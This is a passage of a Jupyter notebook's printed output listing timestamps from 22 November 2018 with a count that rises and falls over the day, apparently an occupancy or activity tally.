"['2018-11-22 10:09:36.536858', 17]\n",
"['2018-11-22 10:09:37.403438', 18]\n",
"['2018-11-22 10:09:45.603450', 19]\n",
"['2018-11-22 10:09:52.977310', 20]\n",
"['2018-11-22 10:10:18.953081', 21]\n",
"['2018-11-22 10:11:23.926816', 22]\n",
"['2018-11-22 10:11:30.605297', 23]\n",
"['2018-11-22 10:11:42.786611', 22]\n",
"['2018-11-22 10:12:07.303882', 23]\n",
"['2018-11-22 10:13:21.146896', 21]\n",
"['2018-11-22 10:13:46.502296', 20]\n",
"['2018-11-22 10:13:53.439998', 19]\n",
"['2018-11-22 10:13:54.981534', 20]\n",
"['2018-11-22 10:14:00.182926', 19]\n",
"['2018-11-22 10:14:06.692129', 20]\n",
"['2018-11-22 10:15:06.941431', 21]\n",
"['2018-11-22 10:15:12.901936', 20]\n",
"['2018-11-22 10:15:15.655350', 19]\n",
"['2018-11-22 10:15:22.636487', 18]\n",
"['2018-11-22 10:15:24.854014', 17]\n",
"['2018-11-22 10:15:42.310156', 15]\n",
"['2018-11-22 10:16:09.680671', 14]\n",
"['2018-11-22 10:16:35.974610', 13]\n",
"['2018-11-22 10:16:50.207337', 12]\n",
"['2018-11-22 10:17:07.419653', 11]\n",
"['2018-11-22 10:17:38.420519', 12]\n",
"['2018-11-22 10:18:01.290595', 13]\n",
"['2018-11-22 10:19:16.768306', 11]\n",
"['2018-11-22 10:19:23.182496', 10]\n",
"['2018-11-22 10:19:47.235465', 11]\n",
"['2018-11-22 10:22:11.243449', 8]\n",
"['2018-11-22 10:23:20.927128', 9]\n",
"['2018-11-22 10:23:44.599694', 8]\n",
"['2018-11-22 10:24:00.328195', 7]\n",
"['2018-11-22 10:26:26.704156', 5]\n",
"['2018-11-22 10:28:43.491552', 3]\n",
"['2018-11-22 10:32:26.657051', 4]\n",
"['2018-11-22 10:33:04.355258', 5]\n",
"['2018-11-22 10:39:37.537360', 3]\n",
"['2018-11-22 10:40:09.344259', 4]\n",
"['2018-11-22 10:48:44.303292', 3]\n",
"['2018-11-22 10:51:02.683999', 4]\n",
"['2018-11-22 10:55:36.191684', 5]\n",
"['2018-11-22 10:56:00.018998', 6]\n",
"['2018-11-22 10:56:18.283277', 5]\n",
"['2018-11-22 10:57:31.953218', 6]\n",
"['2018-11-22 10:57:57.450697', 7]\n",
"['2018-11-22 10:58:50.819889', 8]\n",
"['2018-11-22 10:59:06.362180', 9]\n",
"['2018-11-22 11:00:06.935472', 10]\n",
"['2018-11-22 11:00:44.981089', 9]\n",
"['2018-11-22 11:01:03.189449', 10]\n",
"['2018-11-22 11:01:07.331749', 11]\n",
"['2018-11-22 11:01:30.888003', 12]\n",
"['2018-11-22 11:01:42.828931', 13]\n",
"['2018-11-22 11:02:02.506410', 12]\n",
"['2018-11-22 11:02:24.395371', 13]\n",
"['2018-11-22 11:02:32.160290', 14]\n",
"['2018-11-22 11:02:43.818061', 15]\n",
"['2018-11-22 11:02:49.235785', 16]\n",
"['2018-11-22 11:02:52.114432', 15]\n",
"['2018-11-22 11:03:14.197809', 16]\n",
"['2018-11-22 11:03:40.883336', 17]\n",
"['2018-11-22 11:04:05.061835', 16]\n",
"['2018-11-22 11:04:07.028671', 17]\n",
"['2018-11-22 11:04:41.402798', 18]\n",
"['2018-11-22 11:04:44.452634', 19]\n",
"['2018-11-22 11:05:03.118759', 18]\n",
"['2018-11-22 11:05:06.465282', 19]\n",
"['2018-11-22 11:05:41.011012', 20]\n",
"['2018-11-22 11:05:49.030227', 19]\n",
"['2018-11-22 11:05:51.076861', 18]\n",
"['2018-11-22 11:05:53.484981', 19]\n",
"['2018-11-22 11:05:55.590286', 20]\n",
"['2018-11-22 11:06:08.388642', 21]\n",
"['2018-11-22 11:06:11.404207', 20]\n",
"['2018-11-22 11:06:17.029996', 19]\n",
"['2018-11-22 11:06:54.348337', 20]\n",
"['2018-11-22 11:07:35.864496', 18]\n",
"['2018-11-22 11:08:10.501432', 17]\n",
"['2018-11-22 11:08:15.255558', 18]\n",
"['2018-11-22 11:08:23.488227', 19]\n",
"['2018-11-22 11:08:24.328320', 20]\n",
"['2018-11-22 11:08:27.776364', 21]\n",
"['2018-11-22 11:08:30.107577', 22]\n",
"['2018-11-22 11:08:38.011619', 23]\n",
"['2018-11-22 11:08:42.794797', 22]\n",
"['2018-11-22 11:09:00.651608', 23]\n",
"['2018-11-22 11:09:11.960033', 24]\n",
"['2018-11-22 11:09:20.363873', 25]\n",
"['2018-11-22 11:09:30.221138', 26]\n",
"['2018-11-22 11:09:51.852646', 25]\n",
"['2018-11-22 11:10:06.032886', 24]\n",
"['2018-11-22 11:10:06.229719', 25]\n",
"['2018-11-22 11:10:13.556290', 24]\n",
"['2018-11-22 11:10:14.225701', 25]\n",
"['2018-11-22 11:10:16.246986', 26]\n",
"['2018-11-22 11:10:35.217997', 25]\n",
"['2018-11-22 11:10:40.403857', 24]\n",
"['2018-11-22 11:10:45.219161', 23]\n",
"['2018-11-22 11:10:47.420971', 24]\n",
"['2018-11-22 11:10:53.454388', 21]\n",
"['2018-11-22 11:10:55.233013', 20]\n",
"['2018-11-22 11:10:55.592082', 21]\n",
"['2018-11-22 11:10:57.654311', 20]\n",
"['2018-11-22 11:11:03.083156', 21]\n",
"['2018-11-22 11:11:57.805946', 22]\n",
"['2018-11-22 11:13:20.109636', 18]\n",
"['2018-11-22 11:13:29.344556', 19]\n",
"['2018-11-22 11:13:55.019052', 17]\n",
"['2018-11-22 11:14:06.286416', 18]\n",
"['2018-11-22 11:14:09.115644', 19]\n",
"['2018-11-22 11:14:15.695349', 20]\n",
"['2018-11-22 11:14:16.925264', 19]\n",
"['2018-11-22 11:14:21.927097', 20]\n",
"['2018-11-22 11:14:28.790893', 18]\n",
"['2018-11-22 11:14:31.102124', 17]\n",
"['2018-11-22 11:14:58.579128', 14]\n",
"['2018-11-22 11:15:04.748008', 13]\n",
"['2018-11-22 11:15:06.772877', 11]\n",
"['2018-11-22 11:15:07.041521', 12]\n",
"['2018-11-22 11:15:27.440609', 13]\n",
"['2018-11-22 11:15:56.251212', 14]\n",
"['2018-11-22 11:16:32.852538', 13]\n",
"['2018-11-22 11:16:46.595589', 14]\n",
"['2018-11-22 11:16:53.039300', 15]\n",
"['2018-11-22 11:17:06.115075', 16]\n",
"['2018-11-22 11:17:11.582048', 17]\n",
"['2018-11-22 11:17:21.589823', 16]\n",
"['2018-11-22 11:17:21.708665', 17]\n",
"['2018-11-22 11:17:30.665144', 18]\n",
"['2018-11-22 11:18:14.843720', 19]\n",
"['2018-11-22 11:18:41.165400', 16]\n",
"['2018-11-22 11:19:28.772876', 15]\n",
"['2018-11-22 11:20:53.507879', 13]\n",
"['2018-11-22 11:23:57.487507', 4]\n",
"['2018-11-22 11:43:26.159349', 3]\n",
"['2018-11-22 11:45:14.117574', 4]\n",
"['2018-11-22 11:51:49.662204', 3]\n",
"['2018-11-22 11:53:14.551172', 4]\n",
"['2018-11-22 11:53:58.298942', 5]\n",
"['2018-11-22 11:55:39.216384', 6]\n",
"['2018-11-22 11:55:42.277694', 7]\n",
"['2018-11-22 11:56:54.790458', 8]\n",
"['2018-11-22 11:59:27.017328', 9]\n",
"['2018-11-22 12:00:49.086506', 10]\n",
"['2018-11-22 12:01:11.731522', 9]\n",
"['2018-11-22 12:01:39.185625', 10]\n",
"['2018-11-22 12:01:57.322050', 11]\n",
"['2018-11-22 12:02:07.461875', 10]\n",
"['2018-11-22 12:02:11.822073', 11]\n",
"['2018-11-22 12:03:07.948596', 12]\n",
"['2018-11-22 12:03:28.058438', 13]\n",
"['2018-11-22 12:03:31.189637', 14]\n",
"['2018-11-22 12:04:01.777874', 13]\n",
"['2018-11-22 12:04:16.431641', 14]\n",
"['2018-11-22 12:04:34.028208', 15]\n",
"['2018-11-22 12:04:48.634378', 16]\n",
"['2018-11-22 12:04:51.744692', 17]\n",
"['2018-11-22 12:05:12.647873', 18]\n",
"['2018-11-22 12:05:18.245651', 19]\n",
"['2018-11-22 12:05:28.764807', 18]\n",
"['2018-11-22 12:05:42.476631', 17]\n",
"['2018-11-22 12:06:00.777908', 18]\n",
"['2018-11-22 12:06:32.895039', 19]\n",
"['2018-11-22 12:07:01.778530', 18]\n",
"['2018-11-22 12:07:46.777604', 14]\n",
"['2018-11-22 12:08:05.425501', 15]\n",
"['2018-11-22 12:08:08.446239', 16]\n",
"['2018-11-22 12:08:08.604729', 17]\n",
"['2018-11-22 12:08:09.991261', 18]\n",
"['2018-11-22 12:08:13.259357', 19]\n",
"['2018-11-22 12:08:23.897394', 18]\n",
"['2018-11-22 12:08:31.517488', 19]\n",
"['2018-11-22 12:08:35.271194', 18]\n",
"['2018-11-22 12:08:45.571099', 19]\n",
"['2018-11-22 12:08:57.891746', 20]\n",
"['2018-11-22 12:09:01.178246', 21]\n",
"['2018-11-22 12:09:04.802895', 22]\n",
"['2018-11-22 12:09:08.368759', 23]\n",
"['2018-11-22 12:09:09.624199', 24]\n",
"['2018-11-22 12:09:09.880783', 25]\n",
"['2018-11-22 12:09:17.005239', 24]\n",
"['2018-11-22 12:09:21.149145', 23]\n",
"['2018-11-22 12:09:47.181273', 21]\n",
"['2018-11-22 12:09:50.461158', 22]\n",
"['2018-11-22 12:09:53.114028', 23]\n"
]
},
{
"name": "stdout",
"output_type": "stream",
"text": [
"['2018-11-22 12:09:58.886043', 22]\n",
"['2018-11-22 12:09:58.985654', 23]\n",
"['2018-11-22 12:10:04.046075', 22]\n",
"['2018-11-22 12:10:09.371308', 23]\n",
"['2018-11-22 12:10:29.625951', 24]\n",
"['2018-11-22 12:10:33.467032', 23]\n",
"['2018-11-22 12:10:45.159258', 24]\n",
"['2018-11-22 12:10:45.853363', 25]\n",
"['2018-11-22 12:10:48.697763', 26]\n",
"['2018-11-22 12:12:11.826504', 27]\n",
"['2018-11-22 12:12:33.135353', 26]\n",
"['2018-11-22 12:12:53.580189', 25]\n",
"['2018-11-22 12:12:55.625788', 24]\n",
"['2018-11-22 12:13:05.696859', 23]\n",
"['2018-11-22 12:13:52.249574', 22]\n",
"['2018-11-22 12:14:04.402000', 20]\n",
"['2018-11-22 12:14:39.726136', 21]\n",
"['2018-11-22 12:14:42.995052', 20]\n",
"['2018-11-22 12:15:11.538645', 19]\n",
"['2018-11-22 12:15:15.605974', 18]\n",
"['2018-11-22 12:15:21.672325', 17]\n",
"['2018-11-22 12:15:27.742679', 16]\n",
"['2018-11-22 12:15:29.760269', 15]\n",
"['2018-11-22 12:15:35.887368', 12]\n",
"['2018-11-22 12:15:39.964121', 11]\n",
"['2018-11-22 12:15:46.128645', 10]\n",
"['2018-11-22 12:16:04.544792', 11]\n",
"['2018-11-22 12:16:05.280437', 12]\n",
"['2018-11-22 12:16:12.550887', 11]\n",
"['2018-11-22 12:16:18.542205', 12]\n",
"['2018-11-22 12:16:39.990133', 11]\n",
"['2018-11-22 12:17:00.173130', 12]\n",
"['2018-11-22 12:17:17.476987', 13]\n",
"['2018-11-22 12:17:24.766172', 14]\n",
"['2018-11-22 12:17:55.172358', 15]\n",
"['2018-11-22 12:18:09.068083', 16]\n",
"['2018-11-22 12:18:31.304378', 17]\n",
"['2018-11-22 12:18:38.783377', 16]\n",
"['2018-11-22 12:18:40.809137', 15]\n",
"['2018-11-22 12:18:44.260387', 16]\n",
"['2018-11-22 12:19:03.032167', 17]\n",
"['2018-11-22 12:19:19.310760', 16]\n",
"['2018-11-22 12:19:21.700692', 17]\n",
"['2018-11-22 12:19:50.821630', 18]\n",
"['2018-11-22 12:20:22.299724', 16]\n",
"['2018-11-22 12:20:52.724734', 17]\n",
"['2018-11-22 12:20:54.119289', 18]\n",
"['2018-11-22 12:21:10.345103', 19]\n",
"['2018-11-22 12:22:35.394399', 18]\n",
"['2018-11-22 12:22:47.611000', 17]\n",
"['2018-11-22 12:23:40.568398', 12]\n",
"['2018-11-22 12:24:41.676322', 9]\n",
"['2018-11-22 12:43:02.140773', 3]\n",
"['2018-11-22 12:43:18.745269', 4]\n",
"['2018-11-22 12:47:03.086024', 3]\n",
"['2018-11-22 12:51:08.611255', 4]\n",
"['2018-11-22 12:53:30.801852', 5]\n",
"['2018-11-22 12:54:31.522451', 4]\n",
"['2018-11-22 12:55:26.741859', 5]\n",
"['2018-11-22 12:56:06.178904', 6]\n",
"['2018-11-22 12:56:12.580646', 7]\n",
"['2018-11-22 12:56:25.126968', 8]\n",
"['2018-11-22 12:56:35.027311', 9]\n",
"['2018-11-22 12:57:16.483030', 10]\n",
"['2018-11-22 12:57:17.631841', 11]\n",
"['2018-11-22 12:57:39.755429', 10]\n",
"['2018-11-22 12:57:55.531259', 11]\n",
"['2018-11-22 12:57:55.831732', 12]\n",
"['2018-11-22 12:59:27.780422', 13]\n",
"['2018-11-22 12:59:35.799726', 14]\n",
"['2018-11-22 12:59:45.768235', 15]\n",
"['2018-11-22 13:00:07.346886', 14]\n",
"['2018-11-22 13:00:12.658028', 13]\n",
"['2018-11-22 13:00:20.347157', 14]\n",
"['2018-11-22 13:00:35.256949', 15]\n",
"['2018-11-22 13:00:40.028961', 16]\n",
"['2018-11-22 13:00:40.495478', 17]\n",
"['2018-11-22 13:00:55.839415', 16]\n",
"['2018-11-22 13:01:35.489765', 17]\n",
"['2018-11-22 13:01:38.152024', 18]\n",
"['2018-11-22 13:01:40.662375', 19]\n",
"['2018-11-22 13:02:07.111289', 20]\n",
"['2018-11-22 13:02:42.883586', 16]\n",
"['2018-11-22 13:02:46.388894', 15]\n",
"['2018-11-22 13:02:49.259381', 16]\n",
"['2018-11-22 13:02:58.214428', 15]\n",
"['2018-11-22 13:03:06.035544', 16]\n",
"['2018-11-22 13:03:14.819182', 17]\n",
"['2018-11-22 13:03:21.805307', 18]\n",
"['2018-11-22 13:04:02.671166', 19]\n",
"['2018-11-22 13:04:08.196977', 18]\n",
"['2018-11-22 13:04:17.326836', 19]\n",
"['2018-11-22 13:04:20.886412', 18]\n",
"['2018-11-22 13:04:29.540545', 19]\n",
"['2018-11-22 13:04:38.156561', 18]\n",
"['2018-11-22 13:04:49.051333', 19]\n",
"['2018-11-22 13:04:54.757741', 20]\n",
"['2018-11-22 13:05:01.378541', 21]\n",
"['2018-11-22 13:05:05.559445', 22]\n",
"['2018-11-22 13:05:08.339022', 23]\n",
"['2018-11-22 13:05:15.696525', 22]\n",
"['2018-11-22 13:05:29.539712', 21]\n",
"['2018-11-22 13:05:34.983942', 22]\n",
"['2018-11-22 13:05:40.399874', 23]\n",
"['2018-11-22 13:05:42.980999', 22]\n",
"['2018-11-22 13:05:49.370269', 23]\n",
"['2018-11-22 13:06:07.475067', 22]\n",
"['2018-11-22 13:06:19.349398', 23]\n",
"['2018-11-22 13:07:09.538795', 21]\n",
"['2018-11-22 13:07:15.701299', 20]\n",
"['2018-11-22 13:08:05.930750', 19]\n",
"['2018-11-22 13:08:19.944369', 17]\n",
"['2018-11-22 13:08:37.789079', 18]\n",
"['2018-11-22 13:08:49.536724', 16]\n",
"['2018-11-22 13:08:54.757684', 15]\n",
"['2018-11-22 13:08:54.965443', 16]\n",
"['2018-11-22 13:09:04.360813', 15]\n",
"['2018-11-22 13:09:08.311581', 16]\n",
"['2018-11-22 13:09:35.900442', 17]\n",
"['2018-11-22 13:09:43.164679', 18]\n",
"['2018-11-22 13:10:25.064640', 17]\n",
"['2018-11-22 13:10:29.260342', 18]\n",
"['2018-11-22 13:10:32.703016', 19]\n",
"['2018-11-22 13:10:37.731647', 20]\n",
"['2018-11-22 13:12:33.088528', 21]\n",
"['2018-11-22 13:13:02.092492', 20]\n",
"['2018-11-22 13:13:40.128473', 21]\n",
"['2018-11-22 13:13:48.137146', 19]\n",
"['2018-11-22 13:13:54.626575', 20]\n",
"['2018-11-22 13:14:09.248274', 19]\n",
"['2018-11-22 13:14:10.538118', 20]\n",
"['2018-11-22 13:14:14.871793', 21]\n",
"['2018-11-22 13:14:15.604820', 22]\n",
"['2018-11-22 13:14:16.139730', 23]\n",
"['2018-11-22 13:14:26.187437', 24]\n",
"['2018-11-22 13:14:36.115729', 23]\n",
"['2018-11-22 13:14:40.564264', 22]\n",
"['2018-11-22 13:14:52.727046', 21]\n",
"['2018-11-22 13:15:01.380539', 20]\n",
"['2018-11-22 13:15:14.795923', 19]\n",
"['2018-11-22 13:15:19.225356', 18]\n",
"['2018-11-22 13:17:03.108887', 17]\n",
"['2018-11-22 13:17:07.809216', 18]\n",
"['2018-11-22 13:17:15.606747', 19]\n",
"['2018-11-22 13:17:36.370804', 20]\n",
"['2018-11-22 13:17:38.868668', 21]\n",
"['2018-11-22 13:17:43.869078', 22]\n",
"['2018-11-22 13:18:09.321341', 21]\n",
"['2018-11-22 13:18:23.532458', 20]\n",
"['2018-11-22 13:18:36.190365', 19]\n",
"['2018-11-22 13:18:40.719847', 20]\n",
"['2018-11-22 13:18:45.337209', 21]\n",
"['2018-11-22 13:19:05.996559', 22]\n",
"['2018-11-22 13:19:10.879112', 23]\n",
"['2018-11-22 13:19:36.005057', 20]\n",
"['2018-11-22 13:19:42.213135', 19]\n",
"['2018-11-22 13:19:57.837629', 18]\n",
"['2018-11-22 13:20:28.177458', 19]\n",
"['2018-11-22 13:20:32.784149', 20]\n",
"['2018-11-22 13:20:41.211867', 21]\n",
"['2018-11-22 13:21:18.105616', 19]\n",
"['2018-11-22 13:21:59.056772', 20]\n",
"['2018-11-22 13:22:20.807873', 21]\n",
"['2018-11-22 13:22:23.472013', 22]\n",
"['2018-11-22 13:22:42.691643', 20]\n",
"['2018-11-22 13:22:43.091137', 19]\n",
"['2018-11-22 13:22:47.756396', 18]\n",
"['2018-11-22 13:22:49.398586', 17]\n",
"['2018-11-22 13:23:16.394190', 16]\n",
"['2018-11-22 13:24:03.133452', 14]\n",
"['2018-11-22 13:24:33.172497', 13]\n",
"['2018-11-22 13:26:09.493309', 11]\n",
"['2018-11-22 13:26:29.633775', 12]\n",
"['2018-11-22 13:26:54.392825', 9]\n",
"['2018-11-22 13:28:32.839111', 10]\n",
"['2018-11-22 13:28:38.613905', 11]\n",
"['2018-11-22 13:28:54.532126', 10]\n",
"['2018-11-22 13:29:09.551282', 9]\n",
"['2018-11-22 13:29:41.155944', 10]\n",
"['2018-11-22 13:30:45.484877', 8]\n",
"['2018-11-22 13:32:06.293182', 7]\n",
"['2018-11-22 13:32:36.315106', 6]\n",
"['2018-11-22 13:32:44.399067', 5]\n",
"['2018-11-22 13:35:05.720657', 4]\n",
"['2018-11-22 13:44:48.935896', 3]\n",
"['2018-11-22 13:49:46.499380', 4]\n",
"['2018-11-22 13:52:38.778579', 5]\n",
"['2018-11-22 13:54:07.869681', 4]\n",
"['2018-11-22 13:54:57.444464', 5]\n",
"['2018-11-22 13:55:08.715309', 6]\n",
"['2018-11-22 13:55:13.846616', 7]\n",
"['2018-11-22 13:55:52.408070', 8]\n",
"['2018-11-22 13:56:00.967121', 9]\n",
"['2018-11-22 13:56:49.874667', 10]\n",
"['2018-11-22 13:57:39.397490', 11]\n",
"['2018-11-22 13:57:58.715393', 12]\n",
"['2018-11-22 13:58:08.755117', 13]\n",
"['2018-11-22 13:58:14.478668', 12]\n",
"['2018-11-22 13:58:23.712205', 13]\n",
"['2018-11-22 13:59:26.367706', 14]\n",
"['2018-11-22 13:59:48.145578', 13]\n",
"['2018-11-22 14:00:05.081356', 14]\n",
"['2018-11-22 14:00:28.278366', 15]\n",
"['2018-11-22 14:00:56.380904', 14]\n",
"['2018-11-22 14:02:08.082988', 13]\n",
"['2018-11-22 14:02:28.866846', 12]\n",
"['2018-11-22 14:03:05.654895', 13]\n",
"['2018-11-22 14:03:26.492784', 12]\n",
"['2018-11-22 14:03:30.378175', 13]\n",
"['2018-11-22 14:03:54.820381', 14]\n",
"['2018-11-22 14:03:57.396792', 15]\n",
"['2018-11-22 14:04:01.139387', 16]\n",
"['2018-11-22 14:04:01.697971', 17]\n",
"['2018-11-22 14:04:03.796725', 18]\n",
"['2018-11-22 14:04:06.098477', 19]\n",
"['2018-11-22 14:04:06.899199', 20]\n",
"['2018-11-22 14:04:14.432417', 21]\n",
"['2018-11-22 14:04:24.156395', 20]\n",
"['2018-11-22 14:04:24.233980', 21]\n",
"['2018-11-22 14:04:35.054392', 20]\n",
"['2018-11-22 14:04:39.507315', 21]\n",
"['2018-11-22 14:04:42.107953', 22]\n",
"['2018-11-22 14:05:05.303070', 23]\n",
"['2018-11-22 14:05:32.811931', 24]\n",
"['2018-11-22 14:06:54.864815', 23]\n",
"['2018-11-22 14:07:11.932484', 22]\n",
"['2018-11-22 14:07:25.058885', 21]\n",
"['2018-11-22 14:07:26.876308', 20]\n",
"['2018-11-22 14:08:02.774936', 19]\n",
"['2018-11-22 14:08:15.106695', 18]\n",
"['2018-11-22 14:08:37.776005', 19]\n",
"['2018-11-22 14:08:45.895791', 20]\n",
"['2018-11-22 14:08:46.791676', 21]\n",
"['2018-11-22 14:08:55.774169', 20]\n",
"['2018-11-22 14:09:04.623260', 21]\n",
"['2018-11-22 14:09:39.795137', 22]\n",
"['2018-11-22 14:10:14.704259', 21]\n"
]
},
{
"name": "stdout",
"output_type": "stream",
"text": [
"['2018-11-22 14:10:34.735649', 22]\n",
"['2018-11-22 14:10:44.743691', 21]\n",
"['2018-11-22 14:10:48.385817', 22]\n",
"['2018-11-22 14:10:57.320039', 21]\n",
"['2018-11-22 14:11:01.614564', 22]\n",
"['2018-11-22 14:11:04.520396', 23]\n",
"['2018-11-22 14:11:14.780776', 22]\n",
"['2018-11-22 14:11:18.902312', 21]\n",
"['2018-11-22 14:11:22.409979', 22]\n",
"['2018-11-22 14:12:09.947326', 23]\n",
"['2018-11-22 14:12:10.013968', 24]\n",
"['2018-11-22 14:12:21.070023', 25]\n",
"['2018-11-22 14:12:28.297197', 26]\n",
"['2018-11-22 14:12:47.699796', 25]\n",
"['2018-11-22 14:13:03.642550', 26]\n",
"['2018-11-22 14:13:45.538781', 25]\n",
"['2018-11-22 14:13:47.601553', 26]\n",
"['2018-11-22 14:13:49.770778', 27]\n",
"['2018-11-22 14:13:55.464528', 26]\n",
"['2018-11-22 14:14:10.361204', 27]\n",
"['2018-11-22 14:14:34.453610', 28]\n",
"['2018-11-22 14:14:40.536013', 26]\n",
"['2018-11-22 14:14:59.073165', 27]\n",
"['2018-11-22 14:15:07.874075', 26]\n",
"['2018-11-22 14:15:12.267119', 27]\n",
"['2018-11-22 14:15:27.660894', 28]\n",
"['2018-11-22 14:15:29.461514', 27]\n",
"['2018-11-22 14:15:39.641927', 26]\n",
"['2018-11-22 14:16:03.884570', 25]\n",
"['2018-11-22 14:16:31.137245', 24]\n",
"['2018-11-22 14:16:36.072257', 25]\n",
"['2018-11-22 14:16:36.828630', 26]\n",
"['2018-11-22 14:17:12.623654', 25]\n",
"['2018-11-22 14:17:14.635378', 24]\n",
"['2018-11-22 14:17:40.646627', 23]\n",
"['2018-11-22 14:17:49.264578', 22]\n",
"['2018-11-22 14:18:32.270686', 21]\n",
"['2018-11-22 14:18:54.514043', 22]\n",
"['2018-11-22 14:19:11.571513', 21]\n",
"['2018-11-22 14:19:23.812714', 20]\n",
"['2018-11-22 14:19:42.162363', 18]\n",
"['2018-11-22 14:19:51.301920', 17]\n",
"['2018-11-22 14:19:57.373954', 16]\n",
"['2018-11-22 14:20:03.451703', 14]\n",
"['2018-11-22 14:20:06.492102', 13]\n",
"['2018-11-22 14:20:07.122564', 14]\n",
"['2018-11-22 14:20:09.755715', 15]\n",
"['2018-11-22 14:20:18.753300', 14]\n",
"['2018-11-22 14:20:21.811726', 13]\n",
"['2018-11-22 14:20:25.410998', 14]\n",
"['2018-11-22 14:20:27.077820', 15]\n",
"['2018-11-22 14:20:33.840180', 16]\n",
"['2018-11-22 14:20:37.264730', 14]\n",
"['2018-11-22 14:20:41.469442', 15]\n",
"['2018-11-22 14:21:28.965043', 14]\n",
"['2018-11-22 14:22:00.943259', 15]\n",
"['2018-11-22 14:22:59.238166', 13]\n",
"['2018-11-22 14:24:44.465667', 11]\n",
"['2018-11-22 14:25:00.286062', 9]\n",
"['2018-11-22 14:25:59.263986', 8]\n",
"['2018-11-22 14:26:02.522850', 7]\n",
"['2018-11-22 14:27:04.430342', 6]\n",
"['2018-11-22 14:28:29.792757', 7]\n",
"['2018-11-22 14:29:00.100892', 8]\n",
"['2018-11-22 14:29:08.512324', 7]\n",
"['2018-11-22 14:29:14.826627', 8]\n",
"['2018-11-22 14:29:37.150274', 9]\n",
"['2018-11-22 14:30:07.187281', 8]\n",
"['2018-11-22 14:31:34.617436', 9]\n",
"['2018-11-22 14:32:10.170433', 8]\n",
"['2018-11-22 14:33:06.846593', 7]\n",
"['2018-11-22 14:33:46.446067', 6]\n",
"['2018-11-22 14:38:45.094697', 5]\n",
"['2018-11-22 14:44:53.282260', 3]\n",
"['2018-11-22 14:58:10.073635', 4]\n",
"['2018-11-22 14:58:14.333238', 5]\n",
"['2018-11-22 14:59:07.983473', 6]\n",
"['2018-11-22 14:59:57.725700', 7]\n",
"['2018-11-22 15:00:26.496390', 8]\n",
"['2018-11-22 15:01:29.731356', 9]\n",
"['2018-11-22 15:03:06.621355', 10]\n",
"['2018-11-22 15:03:39.335998', 11]\n",
"['2018-11-22 15:04:14.201245', 12]\n",
"['2018-11-22 15:04:23.803847', 13]\n",
"['2018-11-22 15:04:29.819387', 12]\n",
"['2018-11-22 15:05:01.909707', 13]\n",
"['2018-11-22 15:06:01.435003', 12]\n",
"['2018-11-22 15:06:27.408286', 13]\n",
"['2018-11-22 15:06:57.266042', 14]\n",
"['2018-11-22 15:07:23.469118', 13]\n",
"['2018-11-22 15:07:46.714281', 12]\n",
"['2018-11-22 15:08:38.412739', 9]\n",
"['2018-11-22 15:09:02.954452', 10]\n",
"['2018-11-22 15:09:33.357402', 9]\n",
"['2018-11-22 15:09:33.600651', 10]\n",
"['2018-11-22 15:09:36.173785', 11]\n",
"['2018-11-22 15:09:36.396286', 12]\n",
"['2018-11-22 15:09:41.862093', 13]\n",
"['2018-11-22 15:09:43.404434', 14]\n",
"['2018-11-22 15:10:00.218021', 15]\n",
"['2018-11-22 15:10:43.408253', 14]\n",
"['2018-11-22 15:10:44.608513', 15]\n",
"['2018-11-22 15:11:16.496913', 16]\n",
"['2018-11-22 15:12:59.190594', 17]\n",
"['2018-11-22 15:13:19.195088', 16]\n",
"['2018-11-22 15:13:39.187572', 15]\n",
"['2018-11-22 15:13:48.255766', 16]\n",
"['2018-11-22 15:14:03.428790', 17]\n",
"['2018-11-22 15:14:06.525250', 18]\n",
"['2018-11-22 15:14:35.363724', 16]\n",
"['2018-11-22 15:14:52.082977', 14]\n",
"['2018-11-22 15:14:52.143228', 15]\n",
"['2018-11-22 15:14:58.391077', 14]\n",
"['2018-11-22 15:15:05.453747', 13]\n",
"['2018-11-22 15:15:06.006455', 14]\n",
"['2018-11-22 15:15:07.957524', 13]\n",
"['2018-11-22 15:15:25.024940', 12]\n",
"['2018-11-22 15:16:01.793376', 13]\n",
"['2018-11-22 15:16:24.325092', 14]\n",
"['2018-11-22 15:16:49.078978', 15]\n",
"['2018-11-22 15:17:32.570184', 16]\n",
"['2018-11-22 15:18:32.812015', 14]\n",
"['2018-11-22 15:18:52.844768', 13]\n",
"['2018-11-22 15:18:53.427319', 12]\n",
"['2018-11-22 15:19:07.789898', 13]\n",
"['2018-11-22 15:19:29.473083', 14]\n",
"['2018-11-22 15:19:34.494055', 13]\n",
"['2018-11-22 15:19:42.361832', 12]\n",
"['2018-11-22 15:20:15.573606', 11]\n",
"['2018-11-22 15:20:24.471190', 10]\n",
"['2018-11-22 15:21:32.846760', 7]\n",
"['2018-11-22 15:22:24.916816', 8]\n",
"['2018-11-22 15:24:12.998794', 6]\n",
"['2018-11-22 15:27:11.399332', 4]\n",
"['2018-11-22 15:29:07.667125', 3]\n",
"['2018-11-22 15:46:44.083313', 4]\n",
"['2018-11-22 15:46:59.509512', 5]\n",
"['2018-11-22 15:47:01.047738', 6]\n",
"['2018-11-22 15:47:40.298445', 7]\n",
"['2018-11-22 15:48:53.266259', 8]\n",
"['2018-11-22 15:49:48.978687', 9]\n",
"['2018-11-22 15:50:09.397427', 10]\n",
"['2018-11-22 15:50:23.875748', 11]\n",
"['2018-11-22 15:50:35.608801', 10]\n",
"['2018-11-22 15:50:39.642313', 11]\n",
"['2018-11-22 15:50:41.894706', 12]\n",
"['2018-11-22 15:50:46.608442', 11]\n",
"['2018-11-22 15:51:02.381531', 9]\n",
"['2018-11-22 15:51:07.901360', 10]\n",
"['2018-11-22 15:52:18.861699', 11]\n",
"['2018-11-22 15:52:32.418487', 12]\n",
"['2018-11-22 15:53:42.500095', 13]\n",
"['2018-11-22 15:53:54.375387', 14]\n",
"['2018-11-22 15:54:16.752537', 15]\n",
"['2018-11-22 15:54:30.193927', 16]\n",
"['2018-11-22 15:54:31.295320', 17]\n",
"['2018-11-22 15:54:40.886036', 16]\n",
"['2018-11-22 15:55:24.544385', 17]\n",
"['2018-11-22 15:56:22.972433', 16]\n",
"['2018-11-22 15:56:54.608707', 15]\n",
"['2018-11-22 15:57:05.561133', 14]\n",
"['2018-11-22 15:57:11.552089', 15]\n",
"['2018-11-22 15:58:12.890616', 14]\n",
"['2018-11-22 15:58:48.988295', 13]\n",
"['2018-11-22 15:59:11.644189', 12]\n",
"['2018-11-22 15:59:13.252325', 11]\n",
"['2018-11-22 15:59:24.108544', 12]\n",
"['2018-11-22 15:59:37.205517', 13]\n",
"['2018-11-22 16:00:18.119192', 14]\n",
"['2018-11-22 16:00:22.199092', 13]\n",
"['2018-11-22 16:00:22.682023', 14]\n",
"['2018-11-22 16:00:51.856022', 15]\n",
"['2018-11-22 16:01:13.359736', 13]\n",
